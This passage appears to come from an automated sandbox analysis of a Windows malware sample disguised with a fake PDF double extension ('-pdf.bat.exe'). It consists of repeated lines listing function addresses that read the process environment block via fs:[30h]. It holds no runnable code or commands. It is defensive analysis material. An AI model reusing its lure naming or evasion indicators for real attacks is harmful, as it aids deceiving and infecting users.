            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D550E4 mov eax, dword ptr fs:[00000030h]4_2_32D550E4
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D550E4 mov ecx, dword ptr fs:[00000030h]4_2_32D550E4
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D2A0E3 mov ecx, dword ptr fs:[00000030h]4_2_32D2A0E3
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32E050D9 mov eax, dword ptr fs:[00000030h]4_2_32E050D9
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D380E9 mov eax, dword ptr fs:[00000030h]4_2_32D380E9
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D35096 mov eax, dword ptr fs:[00000030h]4_2_32D35096
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D5D090 mov eax, dword ptr fs:[00000030h]4_2_32D5D090
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D5D090 mov eax, dword ptr fs:[00000030h]4_2_32D5D090
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D6909C mov eax, dword ptr fs:[00000030h]4_2_32D6909C
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D3208A mov eax, dword ptr fs:[00000030h]4_2_32D3208A
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D2D08D mov eax, dword ptr fs:[00000030h]4_2_32D2D08D
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DF60B8 mov eax, dword ptr fs:[00000030h]4_2_32DF60B8
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DF60B8 mov ecx, dword ptr fs:[00000030h]4_2_32DF60B8
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32E05060 mov eax, dword ptr fs:[00000030h]4_2_32E05060
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D32050 mov eax, dword ptr fs:[00000030h]4_2_32D32050
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DD705E mov ebx, dword ptr fs:[00000030h]4_2_32DD705E
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DD705E mov eax, dword ptr fs:[00000030h]4_2_32DD705E
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D5B052 mov eax, dword ptr fs:[00000030h]4_2_32D5B052
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D41070 mov eax, dword ptr fs:[00000030h]4_2_32D41070
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D41070 mov ecx, dword ptr fs:[00000030h]4_2_32D41070
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D41070 mov eax, dword ptr fs:[00000030h]4_2_32D41070
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D41070 mov eax, dword ptr fs:[00000030h]4_2_32D41070
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D41070 mov eax, dword ptr fs:[00000030h]4_2_32D41070
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D41070 mov eax, dword ptr fs:[00000030h]4_2_32D41070
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D41070 mov eax, dword ptr fs:[00000030h]4_2_32D41070
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D41070 mov eax, dword ptr fs:[00000030h]4_2_32D41070
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D41070 mov eax, dword ptr fs:[00000030h]4_2_32D41070
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D41070 mov eax, dword ptr fs:[00000030h]4_2_32D41070
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D41070 mov eax, dword ptr fs:[00000030h]4_2_32D41070
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D41070 mov eax, dword ptr fs:[00000030h]4_2_32D41070
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D41070 mov eax, dword ptr fs:[00000030h]4_2_32D41070
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D5C073 mov eax, dword ptr fs:[00000030h]4_2_32D5C073
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D4E016 mov eax, dword ptr fs:[00000030h]4_2_32D4E016
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D4E016 mov eax, dword ptr fs:[00000030h]4_2_32D4E016
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D4E016 mov eax, dword ptr fs:[00000030h]4_2_32D4E016
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D4E016 mov eax, dword ptr fs:[00000030h]4_2_32D4E016
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DF903E mov eax, dword ptr fs:[00000030h]4_2_32DF903E
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DF903E mov eax, dword ptr fs:[00000030h]4_2_32DF903E
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DF903E mov eax, dword ptr fs:[00000030h]4_2_32DF903E
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DF903E mov eax, dword ptr fs:[00000030h]4_2_32DF903E
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D2A020 mov eax, dword ptr fs:[00000030h]4_2_32D2A020
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D2C020 mov eax, dword ptr fs:[00000030h]4_2_32D2C020
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32E061E5 mov eax, dword ptr fs:[00000030h]4_2_32E061E5
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D6D1D0 mov eax, dword ptr fs:[00000030h]4_2_32D6D1D0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D6D1D0 mov ecx, dword ptr fs:[00000030h]4_2_32D6D1D0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DF61C3 mov eax, dword ptr fs:[00000030h]4_2_32DF61C3
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DF61C3 mov eax, dword ptr fs:[00000030h]4_2_32DF61C3
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32E051CB mov eax, dword ptr fs:[00000030h]4_2_32E051CB
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D601F8 mov eax, dword ptr fs:[00000030h]4_2_32D601F8
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D551EF mov eax, dword ptr fs:[00000030h]4_2_32D551EF
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D551EF mov eax, dword ptr fs:[00000030h]4_2_32D551EF
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D551EF mov eax, dword ptr fs:[00000030h]4_2_32D551EF
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D551EF mov eax, dword ptr fs:[00000030h]4_2_32D551EF
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D551EF mov eax, dword ptr fs:[00000030h]4_2_32D551EF
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D551EF mov eax, dword ptr fs:[00000030h]4_2_32D551EF
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D551EF mov eax, dword ptr fs:[00000030h]4_2_32D551EF
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D551EF mov eax, dword ptr fs:[00000030h]4_2_32D551EF
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D551EF mov eax, dword ptr fs:[00000030h]4_2_32D551EF
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D551EF mov eax, dword ptr fs:[00000030h]4_2_32D551EF
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D551EF mov eax, dword ptr fs:[00000030h]4_2_32D551EF
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D551EF mov eax, dword ptr fs:[00000030h]4_2_32D551EF
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D551EF mov eax, dword ptr fs:[00000030h]4_2_32D551EF
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D351ED mov eax, dword ptr fs:[00000030h]4_2_32D351ED
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DB019F mov eax, dword ptr fs:[00000030h]4_2_32DB019F
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DB019F mov eax, dword ptr fs:[00000030h]4_2_32DB019F
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DB019F mov eax, dword ptr fs:[00000030h]4_2_32DB019F
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DB019F mov eax, dword ptr fs:[00000030h]4_2_32DB019F
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D2A197 mov eax, dword ptr fs:[00000030h]4_2_32D2A197
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D2A197 mov eax, dword ptr fs:[00000030h]4_2_32D2A197
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D2A197 mov eax, dword ptr fs:[00000030h]4_2_32D2A197
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D70185 mov eax, dword ptr fs:[00000030h]4_2_32D70185
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DEC188 mov eax, dword ptr fs:[00000030h]4_2_32DEC188
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DEC188 mov eax, dword ptr fs:[00000030h]4_2_32DEC188
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D4B1B0 mov eax, dword ptr fs:[00000030h]4_2_32D4B1B0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DE11A4 mov eax, dword ptr fs:[00000030h]4_2_32DE11A4
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DE11A4 mov eax, dword ptr fs:[00000030h]4_2_32DE11A4
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DE11A4 mov eax, dword ptr fs:[00000030h]4_2_32DE11A4
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DE11A4 mov eax, dword ptr fs:[00000030h]4_2_32DE11A4
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D37152 mov eax, dword ptr fs:[00000030h]4_2_32D37152
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D2C156 mov eax, dword ptr fs:[00000030h]4_2_32D2C156
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D36154 mov eax, dword ptr fs:[00000030h]4_2_32D36154
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D36154 mov eax, dword ptr fs:[00000030h]4_2_32D36154
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DC4144 mov eax, dword ptr fs:[00000030h]4_2_32DC4144
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DC4144 mov eax, dword ptr fs:[00000030h]4_2_32DC4144
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DC4144 mov ecx, dword ptr fs:[00000030h]4_2_32DC4144
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DC4144 mov eax, dword ptr fs:[00000030h]4_2_32DC4144
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DC4144 mov eax, dword ptr fs:[00000030h]4_2_32DC4144
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D29148 mov eax, dword ptr fs:[00000030h]4_2_32D29148
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D29148 mov eax, dword ptr fs:[00000030h]4_2_32D29148
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D29148 mov eax, dword ptr fs:[00000030h]4_2_32D29148
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D29148 mov eax, dword ptr fs:[00000030h]4_2_32D29148
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D2F172 mov eax, dword ptr fs:[00000030h]4_2_32D2F172
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D2F172 mov eax, dword ptr fs:[00000030h]4_2_32D2F172
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D2F172 mov eax, dword ptr fs:[00000030h]4_2_32D2F172
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D2F172 mov eax, dword ptr fs:[00000030h]4_2_32D2F172
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D2F172 mov eax, dword ptr fs:[00000030h]4_2_32D2F172
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D2F172 mov eax, dword ptr fs:[00000030h]4_2_32D2F172
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D2F172 mov eax, dword ptr fs:[00000030h]4_2_32D2F172
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D2F172 mov eax, dword ptr fs:[00000030h]4_2_32D2F172
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D2F172 mov eax, dword ptr fs:[00000030h]4_2_32D2F172
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D2F172 mov eax, dword ptr fs:[00000030h]4_2_32D2F172
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D2F172 mov eax, dword ptr fs:[00000030h]4_2_32D2F172
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D2F172 mov eax, dword ptr fs:[00000030h]4_2_32D2F172
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D2F172 mov eax, dword ptr fs:[00000030h]4_2_32D2F172
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D2F172 mov eax, dword ptr fs:[00000030h]4_2_32D2F172
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D2F172 mov eax, dword ptr fs:[00000030h]4_2_32D2F172
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D2F172 mov eax, dword ptr fs:[00000030h]4_2_32D2F172
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D2F172 mov eax, dword ptr fs:[00000030h]4_2_32D2F172
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D2F172 mov eax, dword ptr fs:[00000030h]4_2_32D2F172
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D2F172 mov eax, dword ptr fs:[00000030h]4_2_32D2F172
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D2F172 mov eax, dword ptr fs:[00000030h]4_2_32D2F172
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D2F172 mov eax, dword ptr fs:[00000030h]4_2_32D2F172
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DC9179 mov eax, dword ptr fs:[00000030h]4_2_32DC9179
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32E05152 mov eax, dword ptr fs:[00000030h]4_2_32E05152
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DDA118 mov ecx, dword ptr fs:[00000030h]4_2_32DDA118
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DDA118 mov eax, dword ptr fs:[00000030h]4_2_32DDA118
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DDA118 mov eax, dword ptr fs:[00000030h]4_2_32DDA118
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DDA118 mov eax, dword ptr fs:[00000030h]4_2_32DDA118
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DF0115 mov eax, dword ptr fs:[00000030h]4_2_32DF0115
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D31131 mov eax, dword ptr fs:[00000030h]4_2_32D31131
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D31131 mov eax, dword ptr fs:[00000030h]4_2_32D31131
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D2B136 mov eax, dword ptr fs:[00000030h]4_2_32D2B136
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D2B136 mov eax, dword ptr fs:[00000030h]4_2_32D2B136
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D2B136 mov eax, dword ptr fs:[00000030h]4_2_32D2B136
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D2B136 mov eax, dword ptr fs:[00000030h]4_2_32D2B136
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D60124 mov eax, dword ptr fs:[00000030h]4_2_32D60124
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D6A6C7 mov ebx, dword ptr fs:[00000030h]4_2_32D6A6C7
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D6A6C7 mov eax, dword ptr fs:[00000030h]4_2_32D6A6C7
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D3B6C0 mov eax, dword ptr fs:[00000030h]4_2_32D3B6C0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D3B6C0 mov eax, dword ptr fs:[00000030h]4_2_32D3B6C0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D3B6C0 mov eax, dword ptr fs:[00000030h]4_2_32D3B6C0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D3B6C0 mov eax, dword ptr fs:[00000030h]4_2_32D3B6C0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D3B6C0 mov eax, dword ptr fs:[00000030h]4_2_32D3B6C0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D3B6C0 mov eax, dword ptr fs:[00000030h]4_2_32D3B6C0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DF16CC mov eax, dword ptr fs:[00000030h]4_2_32DF16CC
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DF16CC mov eax, dword ptr fs:[00000030h]4_2_32DF16CC
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DF16CC mov eax, dword ptr fs:[00000030h]4_2_32DF16CC
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DF16CC mov eax, dword ptr fs:[00000030h]4_2_32DF16CC
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DEF6C7 mov eax, dword ptr fs:[00000030h]4_2_32DEF6C7
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D616CF mov eax, dword ptr fs:[00000030h]4_2_32D616CF
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DAE6F2 mov eax, dword ptr fs:[00000030h]4_2_32DAE6F2
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DAE6F2 mov eax, dword ptr fs:[00000030h]4_2_32DAE6F2
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DAE6F2 mov eax, dword ptr fs:[00000030h]4_2_32DAE6F2
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DAE6F2 mov eax, dword ptr fs:[00000030h]4_2_32DAE6F2
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DB06F1 mov eax, dword ptr fs:[00000030h]4_2_32DB06F1
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DB06F1 mov eax, dword ptr fs:[00000030h]4_2_32DB06F1
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DED6F0 mov eax, dword ptr fs:[00000030h]4_2_32DED6F0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DC36EE mov eax, dword ptr fs:[00000030h]4_2_32DC36EE
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DC36EE mov eax, dword ptr fs:[00000030h]4_2_32DC36EE
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DC36EE mov eax, dword ptr fs:[00000030h]4_2_32DC36EE
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DC36EE mov eax, dword ptr fs:[00000030h]4_2_32DC36EE
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DC36EE mov eax, dword ptr fs:[00000030h]4_2_32DC36EE
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DC36EE mov eax, dword ptr fs:[00000030h]4_2_32DC36EE
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D5D6E0 mov eax, dword ptr fs:[00000030h]4_2_32D5D6E0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D5D6E0 mov eax, dword ptr fs:[00000030h]4_2_32D5D6E0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D34690 mov eax, dword ptr fs:[00000030h]4_2_32D34690
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D34690 mov eax, dword ptr fs:[00000030h]4_2_32D34690
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DB368C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DB368C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DB368C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DB368C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D276B2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D276B2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D276B2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D666B0 mov eax, dword ptr fs:[00000030h]
